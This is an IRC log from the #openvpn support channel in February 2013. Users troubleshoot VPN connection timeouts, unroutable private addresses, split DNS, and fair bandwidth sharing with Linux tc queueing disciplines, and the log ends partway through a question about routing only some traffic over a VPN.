[~pwrcycle@173.214.160.92] has joined #openvpn 17:22 -!- pwrcycle [~pwrcycle@173.214.160.92] has quit [Changing host] 17:22 -!- pwrcycle [~pwrcycle@unaffiliated/pwrcycle] has joined #openvpn 17:28 -!- nickanderson is now known as nickanderson_afk 17:32 -!- nutron [~nutron@unaffiliated/nutron] has quit [Quit: I must go eat my cheese!] 17:32 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 17:54 -!- nutron [~nutron@unaffiliated/nutron] has quit [Remote host closed the connection] 17:58 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 18:00 -!- NChief_ [tomme@unaffiliated/nchief] has quit [Ping timeout: 264 seconds] 18:00 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn 18:54 -!- AsadH is now known as zz_AsadH 18:58 -!- midgaze [~mreid@155.229.21.75] has left #openvpn [] 19:02 -!- raidz_away is now known as raidz 19:13 -!- Champi [Champi@rootshell.fr] has quit [Ping timeout: 245 seconds] 19:13 -!- CaBa [caba@unaffiliated/caba] has quit [Ping timeout: 276 seconds] 19:16 -!- Champi [Champi@rootshell.fr] has joined #openvpn 19:16 -!- p3rror [~mezgani@2001:0:53aa:64c:20c2:2140:d606:e632] has quit [Ping timeout: 245 seconds] 19:18 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 19:21 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 240 seconds] 19:27 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 19:28 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 19:28 -!- raidz is now known as raidz_away 19:31 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit] 19:36 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 20:01 -!- bjh4 [~bjh4@12.104.144.2] has joined #openvpn 20:08 -!- fatmandown [~fa@ool-457e7fe1.dyn.optonline.net] has joined #openvpn 20:10 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn 20:10 < fatmandown> For some reason on both win7 and ubuntu 12.04 I'm hanging on "UDPv4 link remote" 20:10 < fatmandown> just won't connect 20:10 < fatmandown> logs here http://pastebin.com/fj624c9u 20:12 < pekster> fatmandown: firewall issue or the service isn't listening on the IP/port you're trying to reach are the likely issues 20:12 < fatmandown> I feel like it isn't a firewall issue b/c ubuntu doesn't even run a firewall by default I don't think 20:12 < fatmandown> and it's the same error on both partitions 20:12 < pekster> ie: the client isn't even able to complete the initial handshake. tcpdump your data to see what's going on 20:13 < pekster> Or start by checking netstat on your server and work out from there (tcpdump the server's listening interface, etc) 20:13 < fatmandown> the firewall on this computer is disabled completely anyway 20:13 < pekster> And the server? 20:13 < fatmandown> no clue, it's on campus 20:14 < fatmandown> i'm new to most of this 20:14 < pekster> Can you route to it? That's a private IP 20:14 < fatmandown> how would i go about finding that out? i'm somewhat incompetent when it comes to networking 20:15 < pekster> Traceroute to it? 20:17 < pekster> If you're outside of whatever org owns that network it won't work anyway since you can't route private IPs across the Internet https://en.wikipedia.org/wiki/Private_network 20:19 < fatmandown> it's a college campus 20:21 < pekster> Then you can likely assume if you're not inside the campus you can't reach a privately-addressed system on the campus. If you don't control the server-side of the network, you need to get further information from those who do 20:22 < pekster> It's like if I told you to see my friend in Apartment 12. You don't know what address I'm talking about, but it's clear to me what "appt 12" mean 20:25 < fatmandown> Damn. I wasn't made aware of that by the professor 20:28 -!- bjh4 [~bjh4@12.104.144.2] has quit [Read error: Operation timed out] 21:00 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 256 seconds] 21:37 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 21:46 -!- MFSOT [~mfsot@pool-74-106-78-146.spfdma.east.verizon.net] has quit [Ping timeout: 256 seconds] 21:55 -!- chick3n [~d0dger@pa-67-235-87-119.dhcp.embarqhsd.net] has joined #openvpn 21:57 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Read error: Connection reset by peer] 21:57 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 21:57 -!- p0rk [~d0dger@pa-67-235-87-119.dhcp.embarqhsd.net] has quit [Ping timeout: 255 seconds] 22:03 -!- jY [~jy@photoblog.com] has joined #openvpn 22:08 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has quit [Read error: Connection reset by peer] 22:53 -!- fatmandown [~fa@ool-457e7fe1.dyn.optonline.net] has quit [Read error: Connection reset by peer] 23:15 -!- bandroid is now known as bandroidx 23:40 -!- jtruckz [~jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 23:40 -!- jtruckz [~jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Client Quit] 23:45 -!- jtruckz [~jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 23:48 -!- jtruckz [~jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Quit: BBL] --- Day changed Thu Feb 14 2013 00:04 -!- jtruckz [~jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 00:04 -!- jtruckz [~jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Quit: BBL] 01:07 -!- b1rkh0ff [~b1rkh0ff@178.77.22.0] has quit [Ping timeout: 272 seconds] 01:19 -!- b1rkh0ff [~b1rkh0ff@178.77.1.72] has joined #openvpn 01:42 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 02:23 -!- p3rror [~mezgani@2001:0:53aa:64c:ca5:6914:d606:a524] has joined #openvpn 02:33 -!- chick3n [~d0dger@pa-67-235-87-119.dhcp.embarqhsd.net] has quit [Read error: Connection reset by peer] 02:44 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 272 seconds] 03:01 -!- Devastator [~devas@186.214.111.94] has joined #openvpn 03:16 -!- xbanux [~xbanux@115.254.75.113] has quit [Ping timeout: 276 seconds] 03:19 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 03:20 -!- zz_AsadH is now known as AsadH 03:26 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 03:56 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Remote host closed the connection] 03:56 -!- md_5- [md_5@mcdevs/trusted/md-5] has joined #openvpn 04:06 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 04:17 -!- Devastator [~devas@186.214.111.94] has quit [Changing host] 04:17 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 04:22 -!- amir [~amir@unaffiliated/amir] has quit [Remote host closed the connection] 04:23 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 04:30 -!- dazo_afk is now known as dazo 05:04 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 05:20 -!- md_5- is now known as md_5 05:55 -!- Saviq_ [~Saviq@178.182.180.40.nat.umts.dynamic.t-mobile.pl] has joined #openvpn 05:55 -!- Saviq_ [~Saviq@178.182.180.40.nat.umts.dynamic.t-mobile.pl] has quit [Client Quit] 06:43 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 260 seconds] 06:50 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:03 -!- master_of_master [~master_of@p57B5322D.dip.t-dialin.net] has quit [Ping timeout: 255 seconds] 07:05 -!- master_of_master [~master_of@p57B52CEE.dip.t-dialin.net] has joined #openvpn 07:14 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Read error: Connection timed out] 07:16 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 07:18 -!- MFSOT [~mfsot@pool-74-106-78-146.spfdma.east.verizon.net] has joined #openvpn 07:19 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 07:28 -!- MFSOT [~mfsot@pool-74-106-78-146.spfdma.east.verizon.net] has quit [Quit: MFSOT] 07:45 -!- p3rror [~mezgani@2001:0:53aa:64c:ca5:6914:d606:a524] has quit [Ping timeout: 245 seconds] 07:45 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 08:07 -!- nickanderson_afk is now known as nickanderson 08:12 -!- nickanderson [~cmdln@ginger.pilgrimpage.com] has left #openvpn [] 08:20 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 08:24 -!- Saviq_ [~Saviq@178.180.221.108.nat.umts.dynamic.t-mobile.pl] has joined #openvpn 08:30 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 08:30 -!- Saviq_ [~Saviq@178.180.221.108.nat.umts.dynamic.t-mobile.pl] has quit [Ping timeout: 248 seconds] 08:30 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 08:31 -!- MariusIT [~userit@86.120.191.55] has joined #openvpn 08:44 -!- p3rror [~mezgani@2001:0:53aa:64c:c41:26b2:d606:a524] has joined #openvpn 08:49 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 08:54 -!- knobo [~bohmer@81.175.44.217] has joined #openvpn 08:56 < knobo> I have trouble connecting with openvpn from one host (host1) to the server, but another host (host2) goes fine. How can I debug this? 08:56 < knobo> I get: Thu Feb 14 15:55:38 2013 TCP: connect to server::10101 failed, will try again in 5 seconds: Connection timed out 08:57 < knobo> "nmap -sU -p 10101 -v SERVER" says: Host "SERVER" appears to be up ... good. 08:58 < knobo> and PORT STATE SERVICE\n 10101/udp open|filtered unknown 08:58 < knobo> the client which does not work is an debian lenny installation 08:59 < knobo> and it is behind a different network then the one that works. 08:59 < knobo> ssh works fin though. 09:00 < knobo> I tried to change proto to tcp, and it did not help 09:01 < rob0> TCP is not recommended. Please read the entire /topic, as it said you should do. :) There are too many variables to begin to guess. Make a pastebin. 09:02 < knobo> host1 runs OpenVPN 2.1_rc11, and the server runs OpenVPN 2.1.0 09:02 -!- gitsu-sa [~user@unaffiliated/gitsu-sa] has joined #openvpn 09:02 < gitsu-sa> hey; any idea to lock some app to openvpn under Linux? 09:02 < gitsu-sa> i would like to stop them working when openvpn is disconnected 09:03 < rob0> "lock"? If you tell the app to use your tunnel IP address, it will. 09:03 < gitsu-sa> and what it will do when openvpn is down? 09:04 < rob0> heh 09:04 < gitsu-sa> and btw i don't know my tunnel IP, is random 09:04 < rob0> Please read the entire /topic, as it said you should do. :) 09:04 < rob0> !welcome 09:04 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum !wiki 09:04 <@vpnHelper> !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 09:04 < rob0> !goal 09:04 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 09:05 < gitsu-sa> i would like that some apps can access to internet only when openvpn is up 09:05 < gitsu-sa> :o 09:07 < rob0> maybe you want to script something, and/or seek help specific to these unnamed apps. 09:11 < gitsu-sa> than a more easy thing like: internet access only by the openvpn? 09:11 < rob0> !redirect 09:11 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 09:11 <@vpnHelper> http://ircpimps.org/redirect.png 09:11 < rob0> !def1 09:11 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 09:13 < gitsu-sa> are you sure that this will block internet access when openvpn is down? 09:19 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Read error: Connection reset by peer] 09:27 < knobo> http://pastebin.com/wV9RerTu 09:27 < knobo> Here is the config, and also a the result of the command 09:27 < knobo> when I run it on the client that does not work. 09:29 < rob0> aha, this is simple. You're not running a server, you're running p2p mode. Only one connection is possible unless you use multi-client "server" mode. See --mode in the manual. 09:29 < knobo> When I run it from another client, it woks fine 09:29 < knobo> But I'm not connecting with two clients 09:29 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 09:30 < knobo> I only tried the other client, because it does not work from the other. 09:30 < knobo> As it says in the topic, it is most likely the firewall 09:30 < knobo> But can I test that? 09:31 < rob0> depends on your OS and your firewall, and would not directly be on topic here. 09:31 < knobo> ok. Any other suggestions? 09:33 < rob0> If it just times out when you try to connect, it means it's not reaching the other openvpn peer for some reason. That reason would of course be outside openvpn. 09:34 < rob0> Are you sure that "server" is resolving correctly on each of the connecting peers? Try using the IP address to eliminate that. 09:41 -!- jY [~jy@photoblog.com] has left #openvpn [] 09:53 < knobo> I did use ip address, but i changed it to anonymize it. 10:02 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 10:08 -!- amir [~amir@unaffiliated/amir] has quit [Remote host closed the connection] 10:36 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 10:51 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:53 -!- raidz_away is now known as raidz 10:55 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 11:00 -!- AsadH is now known as zz_AsadH 11:01 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 260 seconds] 11:03 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 11:06 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 256 seconds] 11:06 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 11:08 -!- r3zon8 [~r3zon8@vpn.interimhealthcare.com] has left #openvpn [] 11:13 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 11:22 -!- nahmaste [~namaste@c-69-181-131-136.hsd1.ca.comcast.net] has joined #openvpn 11:25 < nahmaste> is it possible to use the DNS on the other side of an openvpn connection while not breaking name lookup on the local LAN thats served by a local DNS server? so i want to be able to look up hostA on the local LAN (which is known to local DNS serverA) and also look up hostB on the remote LAN (which is known to remote DNS serverB) 11:26 <@krzee> !splitdns 11:26 <@vpnHelper> "splitdns" is see http://www.thekelleys.org.uk/dnsmasq/doc.html for dnsmasq, which will let you do split-dns setups 11:26 <@krzee> it's unrelated to openvpn, but thats how you do it ^ 11:29 < nahmaste> krzee: thanks for the link. im currently using bind9/named on the local LAN... so i'd have to replace it with dnsmasq for splitdns, or can it be done with the former? 11:29 <@krzee> dnsmasq 11:29 < pekster> BIND can do it too 11:29 <@krzee> *shrug* 11:29 < pekster> It's just more complicated to use BIND than dnsmasq 11:29 <@krzee> using views? 11:29 < rob0> views 11:30 <@krzee> heh ya i guess that works too 11:30 <@krzee> never used bind views for anything more than IRC host spoofing lol 11:30 < pekster> views are common on corporate setups running split-DNS 11:30 <@krzee> (tell the irc nameserver it resolves, but the rest of the world it doesnt) 11:31 < nahmaste> thanks for the info guys, ill look into it 11:32 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 11:38 <+hazardous> hi crazy hi pek, mornin 11:39 <@krzee> mornin 11:41 -!- zz_AsadH is now known as AsadH 11:44 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 11:47 -!- dazo is now known as dazo_afk 11:49 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 11:50 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 260 seconds] 11:57 -!- KaiForce [~chatzilla@adsl-70-228-90-247.dsl.akrnoh.ameritech.net] has joined #openvpn 12:03 < bandroidx> anyone know if there is an easy way to limit bandwith depending on the number of connected users on an openvpn server, like full 100mbit if 1 users, 50/50 if 2 users, 30/30/30 if 3 users, etc? 12:03 < pekster> QoS 12:03 < bandroidx> yes the shaping part is not a problem 12:04 < bandroidx> its the based on number of openvpn users that is 12:04 < bandroidx> i am wondering if its going to have ot involve some in depth scripting based on connect/disconnect scripts 12:04 < pekster> Not really. your example suggests you want to use the link and fairly queue for backend clients 12:05 < bandroidx> oh good point 12:05 < pekster> I'd just use a queue like sfq at leaf nodes (in the Linux/tc world) and call it go 12:05 < bandroidx> i am over thinking it 12:05 < pekster> good* 12:05 < pekster> hfsc/htb can be used too, but yea, you need rules and crap to put clients into buckets; that's messy, and unless you have some real need, probably pointless 12:06 < bandroidx> i was planning on going with htb 12:06 < bandroidx> now i realize thats not ideal 12:06 < pekster> Check out sfq leaf qdiscs 12:06 < pekster> I have great success with those on the end of my egrees queues 12:07 < bandroidx> and since its all through an openvpn tunnel they cant blow through it by opening many connections 12:07 < pekster> Basically, it insures that no single stream of traffic can "dwarf out" the others 12:07 < pekster> Easy fix for you then: use tbf at the root, and put sfq under it 12:07 < pekster> Done 12:08 < pekster> No htb, no dynamic rules, none of that 12:08 < bandroidx> sweet 12:08 < bandroidx> and if they open like 10 ftp connections it wont matter because its over 1 single tunnel connection 12:09 < bandroidx> would i even need a token bucket filter at the rooT? 12:09 < pekster> Not if your upstream queuing is okay 12:09 < pekster> I'm on cable, and that crap has NASTY large queues, so I really require a tbf at my root to avoid flooding it 12:09 < pekster> I can literally get 30 second (not ms, 30 *second*) ping times by flooding upload 12:10 < bandroidx> ahh 12:10 < bandroidx> this is a dedi 12:10 < bandroidx> so it should be ok i think 12:10 < bandroidx> 100/100 dedi 12:10 < pekster> Still depends how upstream works ;) 12:10 < bandroidx> true 12:10 < bandroidx> seems the example will work at first glance 12:10 < bandroidx> http://pastie.org/6166422 12:12 < bandroidx> this is the original: http://pastie.org/6166434 - is whats shown the bottom auto generated based on whats in the sfq.tcc? i am not clear what is going on t here 12:13 < pekster> I have nfi what "sfq.tcc' is 12:13 < bandroidx> its a file they made 12:13 < pekster> Right 12:13 < bandroidx> what is odd they are using tcc 12:13 < bandroidx> the command is tc 12:14 < bandroidx> so i am confused lol 12:14 < pekster> no clue what tcc is either 12:14 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 12:14 < bandroidx> odd they would have a typo on their own howto 12:14 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn 12:14 < pekster> You don't pipe 'tc' commands to the 'tc' commanad... 12:14 < pekster> It's some random paste online; maybe it's just wrong ;) 12:14 < bandroidx> so then tcc must be something different 12:15 < pekster> Lots of bad/crappy/wrong guides on "The Internet" 12:15 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Remote host closed the connection] 12:15 < bandroidx> i thought this was the official tc howto though lol 12:15 < pekster> my qdisc on my uplink, as reported by 'tc qdisc show dev eth0.1' http://fpaste.org/iGCf/ 12:15 < pekster> http://lartc.org/howto/ <-- the most "official" howto you're going to find 12:16 <@vpnHelper> Title: Linux Advanced Routing & Traffic Control HOWTO (at lartc.org) 12:16 < bandroidx> your uplink is like 3mbit? 12:16 < pekster> give or take, yea 12:16 < pekster> You don't need the htb/prio stuff (that's for me to do filtering based on netfilter CLASSIFY targets) 12:17 < pekster> The things you want to note is my tbf at the root (if you need a "master speed" knob) and sfq as a leaf-qdisc 12:17 < pekster> The rest is just a sample thta may not be suitable for you 12:17 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 12:17 < pekster> 2:1 is my prio band 0 for "realtime" traffic, 2:2 is where sfq sits for all my client's "normal" traffic, and 2:3 is strictly for bittorrent/DHT 12:18 < pekster> (hence a priomap of all 1's to drop unclassified things into 2:2) 12:18 < pekster> Again, that's all not really useful for you, I think 12:19 < bandroidx> can i see your priomap? 12:19 < bandroidx> i want to do something similiar on my home connection 12:19 < pekster> It's all there dude 12:19 < bandroidx> how does it know what is bittorrent? 12:19 < pekster> netfilter 12:20 < bandroidx> ah so you have netfilter setup to put the various traffic into different bands? 12:20 < pekster> http://fpaste.org/dpoB/ 12:20 < pekster> see iptables-extensions(8) for the CLASSIFY target 12:20 < bandroidx> ahhh ok, i did some work with classify in the past, i forget what for 12:20 < pekster> You can do it in tc filter rules too 12:21 < pekster> I hate tc-filter, becuase it *still* lacks a lousy manpage 12:21 < bandroidx> so bittorrent/dht are on 1119 and 6112? 12:21 < pekster> netfilter is statefully aware anyway 12:21 < pekster> No 12:21 < pekster> 2:1 is prio band 0 12:21 < pekster> "realtime" 12:21 < bandroidx> ahhh what do you use that for? sip? 12:21 < pekster> games 12:21 < bandroidx> ahh ok 12:22 < bandroidx> where does that catch bittorrent? 12:22 < pekster> line 7-9 12:22 < pekster> It's a secondary IP on that host 12:22 < bandroidx> ahhhhhh 12:22 < bandroidx> ok now i get it :) 12:22 < pekster> line 9 doesn't actually "accpet" the packet, just short-circuits the rules so stupid peer can't get priority through me by using gaming ports 12:23 < bandroidx> got you, it just sets the class 12:23 < pekster> I could technically re-write that all using tc filters. But netfilter is better anyway since you can use the powerful state system 12:23 < pekster> Yup 12:23 < bandroidx> where is TOS used? 12:23 < bandroidx> i see your setting TOS 12:23 < bandroidx> is that a code netfilter uses directly? 12:24 < pekster> https://en.wikipedia.org/wiki/IPv4#Packet_structure 12:24 <@vpnHelper> Title: IPv4 - Wikipedia, the free encyclopedia (at en.wikipedia.org) 12:24 < bandroidx> ah ok your setting it for down stream? 12:28 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 12:29 < bandroidx> pekster: so it seems all i really need to do is tc qdisc add dev tun0 root sfq perturb 10 12:29 < pekster> Yup 12:30 < bandroidx> now i run 2 openvpn servers on the same box, if i also do tc qdisc add dev tun1 root sfq perturb 10 12:30 < bandroidx> will that share equally between them? 12:30 < pekster> (I set ToS for upstream; that's all on egress) 12:30 < bandroidx> or each will be seperately handled 12:30 < bandroidx> ah kk thats what i meant 12:30 < pekster> Not that most routers on the Internet actually bother to use it, but some "might" 12:31 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 12:31 < pekster> link-sharing is a more complicated topic. The LARTC howto I link earlier is a good place to start 12:31 < pekster> But, the short answer is that "that won't work how you expect" 12:32 < pekster> You can't just connect 2 separate Internet links into a box and expect to magically double your bandwidth. That's not how it works 12:34 <+EugeneKay> It is on TV 12:35 -!- gitsu-sa [~user@unaffiliated/gitsu-sa] has quit [Read error: Connection reset by peer] 12:35 < bandroidx> i dont mean double my bandwith, i mean i want it to share equally among all on both openvpn servers 12:35 < bandroidx> so if there are 2 on tun0 and 2 on tun1 they would get 25mbit each 12:36 < bandroidx> i am guessing its going to be fair on both tunnels but seprately 12:36 < bandroidx> which means it wont be fair at all 12:36 < bandroidx> i guess i will need to allocate 50mbit to each 12:38 < bandroidx> well forgetting the second server for a second, if i dont set a max bandwith on the root, will it use the interface speed? 12:38 -!- C-S-B [~C-S-B@host81-157-117-86.range81-157.btcentralplus.com] has quit [Ping timeout: 260 seconds] 12:39 < bandroidx> like lets say 3 people connect, one can do 50mbit, the other two can only do 10mbit, will it give the 50mbit user the full 50mbit? 12:39 < bandroidx> i assume it would 12:40 < bandroidx> EugeneKay: i think we are in a lot of the same channels, your nick is so familiar to me 12:41 < bandroidx> ahhh i know you from #koush 12:41 < bandroidx> thats where i see you commonly 12:42 -!- C-S-B [~C-S-B@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn 12:43 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 12:44 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 12:46 <+EugeneKay> About a dozen 12:47 < bandroidx> we are in about a dozen same channels or you are in about a dozen? 12:47 <+EugeneKay> The latter 12:47 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 244 seconds] 12:48 < bandroidx> ahh 12:48 <+EugeneKay> /whois EugeneKay will list the channels we share 12:48 < bandroidx> it only shows you in two 12:48 < bandroidx> i did 12:48 <+EugeneKay> Yeah, privacy mode is default now 12:48 < bandroidx> [EugeneKay] +#openvpn #koush 12:48 < bandroidx> ahh 12:48 <+EugeneKay> And I'm too lazy to remember how o turn it off 12:48 < pekster> bandroidx: Are you doing redirect-gateway or such? Just use sfq on your *physical* egress and sfq will take care of the rest 12:49 < bandroidx> i was just going to ask exactly that pekster 12:49 < pekster> Stop worrying so much about getting "exact, down to the bit" equal stream queuing 12:49 < bandroidx> basically i have tun0 openvpn server does redirect-gateway and tun1 openvpn server does not and is used for dante socks server 12:49 < pekster> Don't mess with per-VPN or per-client or egress on tun devices. You don't need any of that. You need a single sfq rule, and maybe tbf at the root to own the queue 12:50 < bandroidx> awesome that makes life a lot easier 12:50 < pekster> Add complicated crap when you actually need it, not just because someone's blog told you to ;) 12:50 < bandroidx> hahahhaha 12:50 < bandroidx> nah i was just over thinking it 12:51 < bandroidx> didnt need a blog to do that, i do t hat on my own all the damn time 12:51 < bandroidx> especially when it comes to my health lol 12:51 < bandroidx> but what do you mean by "own the queue" regarding tbf at the root 12:52 < bandroidx> ahhh 12:52 < bandroidx> Please note that SFQ, like all non-shaping (work-conserving) qdiscs, is only useful if it owns the 12:52 < bandroidx> queue. This is the case when the link speed equals the actually available bandwidth. This holds for 12:52 < bandroidx> regular phone modems, ISDN connections and direct non-switched ethernet links. 12:52 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 12:52 < bandroidx> eww paste fail 12:52 -!- zhou3594 [~zhou3594@jindan.chem.ou.edu] has joined #openvpn 12:52 -!- zhou3594 is now known as eN_Joy 12:52 < bandroidx> my link speed = the bandwith so i think i am good 12:52 < bandroidx> its not like a gigabit nic on a 100mbit line 12:53 < bandroidx> its 100mbit on 100mbit so i should be good 12:53 < pekster> an upstream router could still end up misconfigured, but generally that's probably accurate 12:53 < bandroidx> well actually the provider does something not give full bandwith even though its a 100/100 dedi 12:54 < pekster> As soon as packets leave whatever network domain you control devices for, you have no control over what they do. They could drop them, loose them, add obscene delays, etc 12:54 < bandroidx> but it holds true enough i dont think it should be a problem 12:54 < bandroidx> yeah but not much i can do about that 12:54 < bandroidx> as its not constant so i cant set it to any sane value 12:54 < pekster> Right 12:54 < pekster> I don't worry about the case my ISP fails to give me what I've set my tbf speed at, because if that's going on, something else is too that's going to screw me over anyway 12:55 < bandroidx> i am having a similiar issue with my fios, i have 50/25 and i can get 50/25 no problem on torrents, ftp, speedtests, http downloads, etc. BUT when i try to watch youtube it usually drops down to 9mbit which is slightly too slow for 720p and it keeps rebuffering over an over and it makes me mad. so today i decided as a test i would setup openvpn on my tablet and see if it helped, and sure enough it fixed the problem 100% 12:56 < bandroidx> which really seems like verizon is traffic shaping youtube, but that makes no sense since they arent shaping anything else especially bittorrent 12:56 < bandroidx> strange right? 12:59 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 12:59 < bandroidx> the only other thing i can think of is that the verizon router is broken 13:00 < pekster> Could be a CDN issue too 13:00 < bandroidx> doesnt youtube have solid CDN? 13:01 < bandroidx> i mean they got like over 100 streaming servers all within like 10ms of me 13:01 < bandroidx> and my vpn is in france lol 13:01 < bandroidx> the one nice thing is i get zero ads 13:01 < pekster> You'd think, but they might interact with the ISP in a way that's breaking 13:01 < pekster> Yup, the ad crap is annoying 13:01 < bandroidx> i guess they dont have ads for france yet 13:02 < bandroidx> i dont get anything, no 5 seconds before skip shit or anything 13:02 < pekster> IIRC adblock can fix that 13:02 < bandroidx> for that reason i dont mind using openvpn for youtube on my tablet lol 13:02 < bandroidx> on android? 13:02 < pekster> Not unless you run firefox 13:02 < pekster> dunno if FF for android works with adblockplus 13:02 < bandroidx> this is the youtube app 13:02 < pekster> Then no :) 13:02 < bandroidx> but adblock for android blocks ads with host files 13:02 < bandroidx> but i dont think it works for youtube ads 13:02 < bandroidx> but not 100% sure 13:03 < bandroidx> EugeneKay would probably know 13:03 <+EugeneKay> I don't youtube 13:17 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 13:19 -!- eN_Joy [~zhou3594@jindan.chem.ou.edu] has quit [Ping timeout: 244 seconds] 13:30 -!- troker [~troker@bou62-129-63-62-124.dhcp.uml.edu] has joined #openvpn 13:31 -!- benedikt [~benedikt@unaffiliated/benedikt] has left #openvpn [] 13:33 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 13:36 < troker> Hey all - Quick question. I pay for a vpn service (you can see config files here http://hidemyass.com/vpn-config/UDP/Canada.Quebec.Montreal_LOC1S4.UDP.ovpn). This works fine and all my traffic goes up the VPN, *BUT* my desired configuration would not push ALL my traffic up; I only want some of my traffic to be sent up the VPN (based on port). Can anyone let me know how I should modify this config file 